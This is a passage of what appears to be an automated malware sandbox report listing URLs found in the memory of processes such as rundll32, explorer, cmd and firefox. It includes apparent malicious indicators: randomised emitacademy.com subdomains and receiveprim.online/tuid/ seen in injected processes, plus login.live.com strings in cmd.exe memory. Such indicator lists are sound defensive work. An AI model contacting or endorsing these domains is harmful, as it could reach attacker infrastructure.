Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://jzsuw.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://k8s2t.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://klmy8.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://l5cyt.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://nrokq.emitacademy.com
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/2
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/:
Source: explorer.exe, 00000016.00000000.2967940530.000000000D9B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3377163786.0000000010CC8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%
Source: explorer.exe, 00000016.00000000.3231171158.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126642750.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380505737.0000000010DB4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com/R
Source: explorer.exe, 00000016.00000000.2889968847.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3162376915.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3030170625.0000000000FD9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3315328206.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3405241936.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: explorer.exe, 00000016.00000000.3215020752.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3098289815.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3361859793.000000000D62D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2959798535.000000000D62D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
Source: explorer.exe, 00000016.00000000.3231089686.0000000010DAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380338082.0000000010DAC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngT
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://pr7r5.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://s249r.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://scg7p.emitacademy.com
Source: explorer.exe, 00000016.00000000.3174608985.0000000003440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3349273884.000000000AD60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.3181130108.0000000003860000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000016.00000000.3370697955.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3224076856.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113269580.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 00000004.00000002.3038954866.0000000005061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://shono.emitacademy.com
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlT
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/images/mlogo.png
Source: firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.emitacademy.com/sitemap.xml
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.foreca.com
Source: rundll32.exe, 00000017.00000002.6902823352.0000000005F9B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.receiveprim.online
Source: rundll32.exe, 00000017.00000002.6902823352.0000000005F9B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.receiveprim.online/tuid/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://y3w1s.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.4149121268.000000002F352000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://zb379.emitacademy.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://active24.cz/objednavka/domain/availability/list
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm
Source: powershell.exe, 00000004.00000002.3038954866.0000000005061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/d
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/h
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/m
Source: explorer.exe, 00000016.00000000.3211706389.000000000D533000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3359295166.000000000D533000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=
Source: explorer.exe, 00000016.00000000.3343582629.0000000009B2B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3107233989.000000000DA06000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
Source: explorer.exe, 00000016.00000000.3228058220.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3376567897.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3121184764.0000000010CA6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2979739268.0000000010BA0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?ok
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://blog.active24.cz//
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://customer.active24.com/
Source: explorer.exe, 00000016.00000000.3370697955.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3224076856.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113269580.000000000DBBD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopy
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/085122-Hosting-a-Servery
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/162807-DNS-hosting?l=cs
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/757409-Bezpe%c4%8dnost
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informace
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%ad
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNS
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/932337-Spolupr%c3%a1ce
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://faq.active24.com/cz/939671-Fakturace-a-platby
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Titillium
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.3046656101.00000000051BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterT
Source: powershell.exe, 00000004.00000003.2572303132.0000000005AF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/css/landing.css
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.eot
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.svg
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.ttf
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/font/active24-icons.woff
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/dns.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/dnssec.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/free.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/image.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/notify.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/redirect.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/default-domain/superpage.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/android-icon-192x192.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-114x114.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-120x120.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-144x144.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-152x152.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/apple-icon-180x180.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-16x16.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-32x32.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/favicon-96x96.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/icon/ms-icon-144x144.png
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/img/webmail_ikony_vlajky.png)
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://gui.active24.cz/library/theme/hp16/style.css
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AACl6Lf.img
Source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063207081.0000000003180000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: rundll32.exe, 00000017.00000002.6881342106.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001A.00000002.4063366800.000000000318A000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001A.00000003.4061182322.00000000031AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://mssql.active24.com/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://mysql.active24.com/
Source: powershell.exe, 00000004.00000002.3101107640.00000000060C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000016.00000000.3071520178.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3196886291.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3344684844.0000000009B94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2932835606.0000000009B94000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com:
Source: explorer.exe, 00000016.00000000.3341209442.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3066597819.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2927724211.0000000009A16000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3193544350.0000000009A16000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.come
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://webftp.active24.com/
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://webmail.active24.com/
Source: explorer.exe, 00000016.00000000.3187341988.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3058326928.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2919364739.00000000056BE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3334828996.00000000056BE000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell
Source: explorer.exe, 00000016.00000000.3224363499.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2973981564.000000000DB47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3113624581.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3371795782.000000000DBC9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz
Source: rundll32.exe, 00000017.00000002.6901486904.0000000005922000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.active24.cz/cssc/a21/main.less?v=b0266c48432540148d77fe7f70991539
